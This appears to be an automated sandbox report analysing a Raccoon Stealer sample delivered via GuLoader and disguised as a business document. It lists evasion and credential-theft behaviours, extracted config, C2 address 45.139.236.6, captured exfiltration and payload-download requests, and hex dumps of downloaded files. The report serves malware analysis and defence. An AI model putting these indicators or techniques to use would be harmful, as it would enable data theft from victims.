Analysis Report CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Overview

General Information

Sample Name: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Analysis ID: 378098
MD5: edeff76475b73d1ea8f9f8eb8afdb738
SHA1: 0ec4cf852db313d8d6c7896f4a8fd10f73228749
SHA256: a214379d617efa77932adcbd90240cf0fb0ba443b50d4f93475edde4d53b1681
Tags: exe
Infos:

Most interesting Screenshot:

Detection

GuLoader Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Raccoon Stealer
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Drops PE files
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: machineinfo.txt.4.dr.binstr Malware Configuration Extractor: Raccoon Stealer {"Config: ": ["00000000 -> Raccoon | 1.7.3", "Build compile date: Sat Feb 27 21:25:06 2021", "Launched at: 2021.03.30 - 12:22:53 GMT", "Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user", "Running on a desktop", "-------------", "- Cookies: 1", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: +1 hrs", "- IP: 84.17.52.79", "- Location: 47.431702, 8.575900 | Zurich, Zurich, Switzerland (8152)", "- ComputerName: 980108", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (5383 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "-------------", "Installed Apps:", "Adobe Acrobat Reader DC (19.012.20035)", "Adobe Refresh Manager (1.8.0)", "Google Chrome (85.0.4183.121)", "Google Update Helper (1.3.35.451)", "Java 8 Update 211 (8.0.2110.12)", "Java Auto Updater (2.8.211.12)", "Update for Skype for Business 2016 (KB4484286) 32-Bit Edition", "-------------"]}
Multi AV Scanner detection for domain / URL
Source: telete.in Virustotal: Detection: 9% Perma Link
Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Compliance:

barindex
Uses 32bit PE files
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 111.67.28.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.4.dr
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 30 Mar 2021 12:22:48 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Thu, 11 Feb 2021 18:55:17 GMTETag: "60257d95-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 45.139.236.6
Source: global traffic HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6
Source: global traffic HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6aContent-Length: 1401Host: 45.139.236.6
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.225.248 195.201.225.248
Source: Joe Sandbox View IP Address: 45.139.236.6 45.139.236.6
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 30 Mar 2021 12:22:51 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Thu, 11 Feb 2021 18:55:16 GMTETag: "60257d94-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: global traffic HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6
Source: global traffic HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: rence":"http://support.apple.com/kb/HT203092","status":"requires_authorization","version":"7.7.6"}]},"chromium-pdf":{"group_name_matcher":"*Chromium PDF Viewer*","mime_types":[],"name":"Chromium PDF Viewer","versions":[{"comment":"Chromium PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"chromium-pdf-plugin":{"group_name_matcher":"*Chromium PDF Plugin*","mime_types":[],"name":"Chromium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video 